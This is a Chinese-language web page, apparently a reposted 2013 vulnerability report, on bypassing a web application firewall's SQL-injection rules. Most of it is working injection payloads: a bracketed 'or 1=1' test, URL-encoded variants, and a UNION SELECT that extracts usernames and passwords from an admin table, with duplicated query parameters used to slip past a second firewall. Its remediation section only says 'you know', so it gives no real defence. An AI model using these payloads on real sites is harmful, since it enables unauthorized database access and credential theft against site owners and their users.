• 选择风格
  • 加入收藏
  • 繁體中文
  • 网站地图
    • 当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

    创新工厂安全宝安全防护绕过漏洞

    时间:2013/4/19 12:09:00 作者:平凡之路 来源:xuhantao.com 浏览:

    在某些web环境下,涛涛电脑知识网,安全宝对防范sql的部分防护规则可被绕过,继续注入...


    ?id=(-575) or 1=1

     

    简单加个括号
    ?id=%28-575%29%20%20or%281%29=%281%29

     

    因此构造
    ?id=%28-575%29UNION%20%28SELECT%201,username,3,4,passwd,6,7,8,9,10,11,12,13,14,15,16,17&id=%2818%29from%28admin%29%29
    之所以使用复参 是为了绕过智创那个防护

     


    标准的也没有拦截

     





    修复方案:
    你懂的

    ,涛涛电脑知识网

  • 上一篇:记一次突破安全狗提权
  • 下一篇:Wordpress HD Webplayer 1.1 SQL注射及修复
    • 相关文章
    • 没有相关文章
    共有评论 0相关评论
    发表我的评论
    • 大名:
    • 内容:
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1